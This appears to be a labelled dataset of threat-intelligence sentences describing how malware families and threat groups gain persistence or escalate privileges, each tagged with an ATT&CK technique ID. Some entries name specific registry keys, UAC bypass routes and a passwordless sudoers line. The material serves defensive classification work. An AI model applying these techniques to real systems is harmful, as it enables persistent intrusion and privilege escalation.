{"text1":"APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.","labels":"['T1547.001']"}
{"text1":"APT33 has deployed a tool known as DarkComet to the Startup folder of a victim, and used Registry run keys to gain persistence.","labels":"['T1547.001']"}
{"text1":"APT37's has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\".","labels":"['T1547.001']"}
{"text1":"APT39 has maintained persistence using the startup folder.","labels":"['T1547.001']"}
{"text1":"APT41 created and modified startup files for persistence. APT41 added a registry key in \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" to establish persistence for Cobalt Strike.","labels":"['T1547.001']"}
{"text1":"Agent Tesla can add itself to the Registry as a startup program to establish persistence.","labels":"['T1547.001']"}
{"text1":"An APT19 HTTP malware variant establishes persistence by setting the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\\".","labels":"['T1547.001']"}
{"text1":"AppleSeed has the ability to create the Registry key name \"EstsoftAutoUpdate\" at \"HKCU\\Software\\Microsoft\/Windows\\CurrentVersion\\RunOnce\" to establish persistence.","labels":"['T1547.001']"}
{"text1":"Aria-body has established persistence via the Startup folder or Run Registry key.","labels":"['T1547.001']"}
{"text1":"Astaroth creates a startup item for persistence.","labels":"['T1547.001']"}
{"text1":"AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.","labels":"['T1547.001']"}
{"text1":"Avaddon uses registry run keys for persistence.","labels":"['T1547.001']"}
{"text1":"BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"BADNEWS installs a registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe\".","labels":"['T1547.001']"}
{"text1":"BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence.","labels":"['T1547.001']"}
{"text1":"BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.","labels":"['T1547.001']"}
{"text1":"Backdoor.Oldrea adds Registry Run keys to achieve persistence.","labels":"['T1547.001']"}
{"text1":"Bazar can create or add files to Registry Run Keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"BitPaymer has set the run key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.","labels":"['T1547.001']"}
{"text1":"BoomBox can establish persistence by writing the Registry value \"MicroNativeCacheSvc\" to \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
{"text1":"Briba creates run key Registry entries pointing to malicious DLLs dropped to disk.","labels":"['T1547.001']"}
{"text1":"Cardinal RAT establishes Persistence by setting the  \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" Registry key to point to its executable.","labels":"['T1547.001']"}
{"text1":"ChChes establishes persistence by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"Chaes has added persistence via the Registry key \"software\\microsoft\\windows\\currentversion\\run\\microsoft windows html help\".","labels":"['T1547.001']"}
{"text1":"Clambling can establish persistence by adding a Registry run key.","labels":"['T1547.001']"}
{"text1":"Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.","labels":"['T1547.001']"}
{"text1":"Cobian RAT creates an autostart Registry key to ensure persistence.","labels":"['T1547.001']"}
{"text1":"Conficker adds Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"Confucius has dropped malicious files into the startup folder `%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup` on a compromised host in order to maintain persistence.","labels":"['T1547.001']"}
{"text1":"Crimson can add Registry run keys for persistence.","labels":"['T1547.001']"}
{"text1":"CrossRAT uses run keys for persistence on Windows","labels":"['T1547.001']"}
{"text1":"Dark Caracal's version of Bandook adds a registry key to \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.","labels":"['T1547.001']"}
{"text1":"Darkhotel has been known to establish persistence by adding programs to the Run Registry key.","labels":"['T1547.001']"}
{"text1":"DnsSystem can write itself to the Startup folder to gain persistence.","labels":"['T1547.001']"}
{"text1":"Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"During Operation Sharpshooter, a first-stage downloader installed Rising Sun to `%Startup%\\mssync.exe` on a compromised host.","labels":"['T1547.001']"}
{"text1":"DustySky achieves persistence by creating a Registry entry in \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
{"text1":"EVILNUM can achieve persistence through the Registry Run key.","labels":"['T1547.001']"}
{"text1":"Emotet has been observed adding the downloaded payload to the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to maintain persistence.","labels":"['T1547.001']"}
{"text1":"EvilBunny has created Registry keys for persistence in \"[HKLM|HKCU]\\\u2026\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
{"text1":"EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence.","labels":"['T1547.001']"}
{"text1":"FELIXROOT adds a shortcut file to the startup folder for persistence.","labels":"['T1547.001']"}
{"text1":"FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.","labels":"['T1547.001']"}
{"text1":"FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.","labels":"['T1547.001']"}
{"text1":"FLASHFLOOD achieves persistence by making an entry in the Registry's Run key.","labels":"['T1547.001']"}
{"text1":"FatDuke has used \"HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run\" to establish persistence.","labels":"['T1547.001']"}
{"text1":"FinFisher establishes persistence by creating the Registry key \"HKCU\\Software\\Microsoft\\Windows\\Run\".","labels":"['T1547.001']"}
{"text1":"Final1stspy creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"FunnyDream can use a Registry Run Key and the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.","labels":"['T1547.001']"}
{"text1":"Gamaredon Group tools have registered Run keys in the registry to give malicious VBS files persistence.","labels":"['T1547.001']"}
{"text1":"Gazer can establish persistence by creating a .lnk file in the Start menu.","labels":"['T1547.001']"}
{"text1":"Gelsemium can set persistence with a Registry run key.","labels":"['T1547.001']"}
{"text1":"Gold Dragon establishes persistence in the Startup folder.","labels":"['T1547.001']"}
{"text1":"Grandoreiro can use run keys and create link files in the startup folder for persistence.","labels":"['T1547.001']"}
{"text1":"GrimAgent can set persistence with a Registry run key.","labels":"['T1547.001']"}
{"text1":"HTTPBrowser has established persistence by setting the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key value for \"wdm\" to the path of the executable. It has also used the Registry entry \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn \u201c%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe\u201d\" to establish persistence.","labels":"['T1547.001']"}
{"text1":"Heyoka Backdoor can establish persistence with the auto start function including using the value `EverNoteTrayUService`.","labels":"['T1547.001']"}
{"text1":"Hi-Zor creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.","labels":"['T1547.001']"}
{"text1":"Inception has maintained persistence by modifying Registry run key value \n \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\".","labels":"['T1547.001']"}
{"text1":"JCry has created payloads in the Startup directory to maintain persistence.","labels":"['T1547.001']"}
{"text1":"JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.","labels":"['T1547.001']"}
{"text1":"KOCTOPUS can set the AutoRun Registry key with a PowerShell command.","labels":"['T1547.001']"}
{"text1":"Kasidet creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"Kazuar adds a sub-key under several Registry run keys.","labels":"['T1547.001']"}
{"text1":"Kimsuky has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce` Registry key.","labels":"['T1547.001']"}
{"text1":"Koadic has added persistence to the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` Registry key.","labels":"['T1547.001']"}
{"text1":"Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key.","labels":"['T1547.001']"}
{"text1":"Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"LoJax has modified the Registry key \"\u2018HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\u2019\" from \"\u2018autocheck autochk *\u2019\" to \"\u2018autocheck autoche *\u2019\" in order to execute its payload during Windows startup.","labels":"['T1547.001']"}
{"text1":"LookBack sets up a Registry Run key to establish a persistence mechanism.","labels":"['T1547.001']"}
{"text1":"Lucifer can persist by setting Registry key values \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\" and \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\".","labels":"['T1547.001']"}
{"text1":"MCMD can use Registry Run Keys for persistence.","labels":"['T1547.001']"}
{"text1":"Machete used the startup folder for persistence.","labels":"['T1547.001']"}
{"text1":"MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.","labels":"['T1547.001']"}
{"text1":"Maze has created a file named \"startup_vrun.bat\" in the Startup folder of a virtual machine to establish persistence.","labels":"['T1547.001']"}
{"text1":"Mivast creates the following Registry entry: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia\".","labels":"['T1547.001']"}
{"text1":"Mongall can establish persistence with the auto start function including using the value `EverNoteTrayUService`.","labels":"['T1547.001']"}
{"text1":"Mosquito establishes persistence under the Registry key \"HKCU\\Software\\Run auto_update\".","labels":"['T1547.001']"}
{"text1":"Most Sakula samples maintain persistence by setting the Registry Run key \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\" in the HKLM or HKCU hive, with the Registry value and file name varying by sample.","labels":"['T1547.001']"}
{"text1":"NOKKI has established persistence by writing the payload to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
{"text1":"Naikon has modified a victim's Windows Run registry to establish persistence.","labels":"['T1547.001']"}
{"text1":"NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism.","labels":"['T1547.001']"}
{"text1":"NavRAT creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.","labels":"['T1547.001']"}
{"text1":"ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory.","labels":"['T1547.001']"}
{"text1":"Octopus achieved persistence by placing a malicious executable in the startup directory and has added the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to the Registry.","labels":"['T1547.001']"}
{"text1":"Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder.","labels":"['T1547.001']"}
{"text1":"PLAINTEE gains persistence by adding the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\".","labels":"['T1547.001']"}
{"text1":"POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.","labels":"['T1547.001']"}
{"text1":"POWERTON can install a Registry Run key for persistence.","labels":"['T1547.001']"}
{"text1":"PROMETHIUM has used Registry run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"PUNCHBUGGY has been observed using a Registry Run key.","labels":"['T1547.001']"}
{"text1":"Patchwork has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"PlugX adds Run key entries in the Registry to establish persistence.","labels":"['T1547.001']"}
{"text1":"PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk.","labels":"['T1547.001']"}
{"text1":"PowerShower sets up persistence with a Registry run key.","labels":"['T1547.001']"}
{"text1":"PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish via the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key.","labels":"['T1547.001']"}
{"text1":"Prikormka adds itself to a Registry Run key with the name guidVGA or guidVSA.","labels":"['T1547.001']"}
{"text1":"Pteranodon copies itself to the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"Pupy adds itself to the startup folder or adds itself to the Registry key \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" for persistence.","labels":"['T1547.001']"}
{"text1":"QakBot can maintain persistence by creating an auto-run Registry key.","labels":"['T1547.001']"}
{"text1":"RCSession has the ability to modify a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software.","labels":"['T1547.001']"}
{"text1":"Ramsay has created Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.","labels":"['T1547.001']"}
{"text1":"Remcos can add itself to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.","labels":"['T1547.001']"}
{"text1":"Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.","labels":"['T1547.001']"}
{"text1":"Revenge RAT creates a Registry key at \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" to survive a system reboot.","labels":"['T1547.001']"}
{"text1":"Rifdoor has created a new registry entry at \"HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics\" with a value of \"C:\\ProgramData\\Initech\\Initech.exe \/run\".","labels":"['T1547.001']"}
{"text1":"RunningRAT adds itself to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence upon reboot.","labels":"['T1547.001']"}
{"text1":"S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}\".","labels":"['T1547.001']"}
{"text1":"SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"SILENTTRINITY can establish a LNK file in the startup folder for persistence.","labels":"['T1547.001']"}
{"text1":"SNUGRIDE establishes persistence through a Registry Run key.","labels":"['T1547.001']"}
{"text1":"SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"STARWHALE can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM` registry key.","labels":"['T1547.001']"}
{"text1":"Saint Bot has established persistence by being copied to the Startup directory or through the `\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` registry key.","labels":"['T1547.001']"}
{"text1":"SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.","labels":"['T1547.001']"}
{"text1":"Seasalt creates a Registry entry to ensure infection after reboot under \"HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run\".","labels":"['T1547.001']"}
{"text1":"ServHelper may attempt to establish persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\" run key.","labels":"['T1547.001']"}
{"text1":"Several Ke3chang backdoors achieved persistence by adding a Run key.","labels":"['T1547.001']"}
{"text1":"Sharpshooter's first-stage downloader installed Rising Sun to the startup folder \"%Startup%\\mssync.exe\".","labels":"['T1547.001']"}
{"text1":"Sidewinder has added paths to executables in the Registry to establish persistence.","labels":"['T1547.001']"}
{"text1":"Silence has used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", and the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"Small Sieve has the ability to add itself to `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift` for persistence.","labels":"['T1547.001']"}
{"text1":"Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.","labels":"['T1547.001']"}
{"text1":"Sykipot has been known to establish persistence by adding programs to the Run Registry key.","labels":"['T1547.001']"}
{"text1":"SysUpdate can use a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"TINYTYPHON installs itself under Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"TeamTNT has added batch scripts to the startup folder.","labels":"['T1547.001']"}
{"text1":"The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"TinyZBot can create a shortcut in the Windows startup folder for persistence.","labels":"['T1547.001', 'T1547.009']"}
{"text1":"TrickBot establishes persistence in the Startup folder.","labels":"['T1547.001']"}
{"text1":"Tropic Trooper has created shortcuts in the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"Truvasys adds a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"Turian can establish persistence by adding Registry Run keys.","labels":"['T1547.001']"}
{"text1":"USBStealer registers itself under a Registry Run key with the name \"USB Disk Security.\"","labels":"['T1547.001']"}
{"text1":"VBShower used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\" to maintain persistence.","labels":"['T1547.001']"}
{"text1":"Variants of Emissary have added Run Registry keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"WarzoneRAT can add itself to the `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` and `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UIF2IS20VK` Registry keys.","labels":"['T1547.001']"}
{"text1":"Windshift has created LNK files in the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"Winnti for Windows can add a service named \"wind0ws\" to the Registry to achieve persistence after reboot.","labels":"['T1547.001']"}
{"text1":"Xbash can create a Startup item for persistence if it determines it is on a Windows system.","labels":"['T1547.001']"}
{"text1":"ZIRCONIUM has created a Registry Run key named \"Dropbox Update Setup\" to establish persistence for a malicious Python binary.","labels":"['T1547.001']"}
{"text1":"Zebrocy creates an entry in a Registry Run key for the malware to execute on startup.","labels":"['T1547.001']"}
{"text1":"Zeus Panda adds persistence by creating Registry Run keys.","labels":"['T1547.001']"}
{"text1":"build_downer has the ability to add itself to the Registry Run key for persistence.","labels":"['T1547.001']"}
{"text1":"gh0st RAT has added a Registry Run key to establish persistence.","labels":"['T1547.001']"}
{"text1":"njRAT has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\" and dropped a shortcut in \"%STARTUP%\".","labels":"['T1547.001']"}
{"text1":"Bazar can use Winlogon Helper DLL to establish persistence.","labels":"['T1547.004']"}
{"text1":"Gazer can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".","labels":"['T1547.004']"}
{"text1":"Remexi achieves persistence using Userinit by adding the Registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\".","labels":"['T1547.004']"}
{"text1":"Tropic Trooper has created the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" and sets the value to establish persistence.","labels":"['T1547.004']"}
{"text1":"Turla established persistence by adding a Shell value under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".","labels":"['T1547.004']"}
{"text1":"Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.","labels":"['T1547.004']"}
{"text1":"PowerSploit's \"Install-SSP\" Persistence module can be used to establish by installing a SSP DLL.","labels":"['T1547.005']"}
{"text1":"The Mimikatz credential dumper contains an implementation of an SSP.","labels":"['T1547.005']"}
{"text1":"Drovorub can use kernel modules to establish persistence.","labels":"['T1547.006']"}
{"text1":"During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence.","labels":"['T1547.006']"}
{"text1":"Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines.","labels":"['T1547.006']"}
{"text1":"Pasam establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.","labels":"['T1547.008']"}
{"text1":"Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.","labels":"['T1547.008']"}
{"text1":"APT29 drops a Windows shortcut file for execution.","labels":"['T1547.009']"}
{"text1":"Comnie establishes persistence via a .lnk file in the victim\u2019s startup path.","labels":"['T1547.009']"}
{"text1":"Dragonfly has manipulated .lnk files to gather user credentials in conjunction with Forced Authentication.","labels":"['T1547.009']"}
{"text1":"Empire can persist by modifying a .LNK file to include a backdoor.","labels":"['T1547.009']"}
{"text1":"Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.","labels":"['T1547.009']"}
{"text1":"Grandoreiro can write or modify browser shortcuts to enable launching of malicious browser extensions.","labels":"['T1547.009']"}
{"text1":"Helminth establishes persistence by creating a shortcut.","labels":"['T1547.009']"}
{"text1":"Kazuar adds a .lnk file to the Windows startup folder.","labels":"['T1547.009']"}
{"text1":"Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user\u2019s Startup folder.","labels":"['T1547.009']"}
{"text1":"MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.","labels":"['T1547.009']"}
{"text1":"Micropsia creates a shortcut to maintain persistence.","labels":"['T1547.009']"}
{"text1":"Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder.","labels":"['T1547.009']"}
{"text1":"RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence.","labels":"['T1547.009']"}
{"text1":"RogueRobin establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.","labels":"['T1547.009']"}
{"text1":"S-Type may create the file \"%HOMEPATH%\\Start Menu\\Programs\\Startup\\Realtek {Unique Identifier}.lnk\", which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.","labels":"['T1547.009']"}
{"text1":"SeaDuke is capable of persisting via a .lnk file stored in the Startup directory.","labels":"['T1547.009']"}
{"text1":"Stuxnet used copies of .lnk shortcuts to propagate through removable media.","labels":"['T1547.009']"}
{"text1":"Earth Lusca has added the Registry key `HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Print Processors\\UDPrint\u201d \/v Driver \/d \u201cspool.dll \/f` to load malware as a Print Processor.","labels":"['T1547.012']"}
{"text1":"Gelsemium can drop itself in \"C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll\" to be loaded automatically by the spoolsv Windows service.","labels":"['T1547.012']"}
{"text1":"The PipeMon installer has modified the Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\" to install PipeMon as a Print Processor.","labels":"['T1547.012']"}
{"text1":"Fysbis has installed itself as an autostart entry under \"~\/.config\/autostart\/dbus-inotifier.desktop\" to establish persistence.","labels":"['T1547.013']"}
{"text1":"NETWIRE can use XDG Autostart Entries to establish persistence.","labels":"['T1547.013']"}
{"text1":"PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.","labels":"['T1547.014']"}
{"text1":"Dok uses AppleScript to install a login Item by sending Apple events to the \"System Events\" process.","labels":"['T1547.015']"}
{"text1":"NETWIRE can persist via startup options for Login items.","labels":"['T1547.015']"}
{"text1":"A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.","labels":"['T1548.002']"}
{"text1":"APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.","labels":"['T1548.002']"}
{"text1":"An older variant of PLAINTEE performs UAC bypass.","labels":"['T1548.002']"}
{"text1":"AppleJeus has presented the user with a UAC prompt to elevate privileges while installing.","labels":"['T1548.002']"}
{"text1":"Avaddon bypasses UAC using the CMSTPLUA COM interface.","labels":"['T1548.002']"}
{"text1":"BitPaymer can suppress UAC prompts by setting the \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" registry key on Windows 10 or \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" on Windows 7 and launching the \"eventvwr.msc\" process, which launches BitPaymer with elevated privileges.","labels":"['T1548.002']"}
{"text1":"Bumblebee has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.","labels":"['T1548.002']"}
{"text1":"CSPY Downloader can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.","labels":"['T1548.002']"}
{"text1":"Clambling has the ability to bypass UAC using a `passuac.dll` file.","labels":"['T1548.002']"}
{"text1":"Cobalt Group has bypassed UAC.","labels":"['T1548.002']"}
{"text1":"Cobalt Strike can use a number of known techniques to bypass Windows UAC.","labels":"['T1548.002']"}
{"text1":"During Operation Honeybee, the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.","labels":"['T1548.002']"}
{"text1":"Empire includes various modules to attempt to bypass UAC for escalation of privileges.","labels":"['T1548.002']"}
{"text1":"Grandoreiro can bypass UAC by registering as the default handler for .MSC files.","labels":"['T1548.002']"}
{"text1":"H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).","labels":"['T1548.002']"}
{"text1":"Honeybee uses a combination of NTWDBLIB.dll and cliconfg.exe to bypass UAC protections using DLL hijacking.","labels":"['T1548.002']"}
{"text1":"InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges.","labels":"['T1548.002']"}
{"text1":"KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe.","labels":"['T1548.002']"}
{"text1":"KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to \u201cAlwaysNotify\".","labels":"['T1548.002']"}
{"text1":"Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.","labels":"['T1548.002']"}
{"text1":"MuddyWater uses various techniques to bypass UAC.","labels":"['T1548.002']"}
{"text1":"Patchwork bypassed User Access Control (UAC).","labels":"['T1548.002']"}
{"text1":"PipeMon installer can use UAC bypass techniques to install the payload.","labels":"['T1548.002']"}
{"text1":"PoshC2 can utilize multiple methods to bypass UAC.","labels":"['T1548.002']"}
{"text1":"Pupy can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.","labels":"['T1548.002']"}
{"text1":"QuasarRAT can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.","labels":"['T1548.002']"}
{"text1":"RCSession can bypass UAC to escalate privileges.","labels":"['T1548.002']"}
{"text1":"RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.","labels":"['T1548.002']"}
{"text1":"Ramsay can use UACMe for privilege escalation.","labels":"['T1548.002']"}
{"text1":"Remcos has a command for UAC bypassing.","labels":"['T1548.002']"}
{"text1":"SILENTTRINITY contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension.","labels":"['T1548.002']"}
{"text1":"Saint Bot has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.","labels":"['T1548.002']"}
{"text1":"Sakula contains UAC bypass code for both 32- and 64-bit systems.","labels":"['T1548.002']"}
{"text1":"ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.","labels":"['T1548.002']"}
{"text1":"UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.","labels":"['T1548.002']"}
{"text1":"WarzoneRAT can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions WarzoneRAT can use the IFileOperation exploit to bypass the UAC module.","labels":"['T1548.002']"}
{"text1":"WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.","labels":"['T1548.002']"}
{"text1":"Winnti for Windows can use a variant of the sysprep UAC bypass.","labels":"['T1548.002']"}
{"text1":"Cobalt Strike can use \"sudo\" to run a command.","labels":"['T1548.003']"}
{"text1":"Dok adds \"admin  ALL=(ALL) NOPASSWD: ALL\" to the \"\/etc\/sudoers\" file.","labels":"['T1548.003']"}
{"text1":"Proton modifies the tty_tickets line in the sudoers file.","labels":"['T1548.003']"}
{"text1":"OSX\/Shlayer can escalate privileges to root by asking the user for credentials.","labels":"['T1548.004']"}
{"text1":"FoggyWeb can allow abuse of a compromised AD FS server's SAML token.","labels":"['T1550']"}
{"text1":"APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.","labels":"['T1550.001']"}
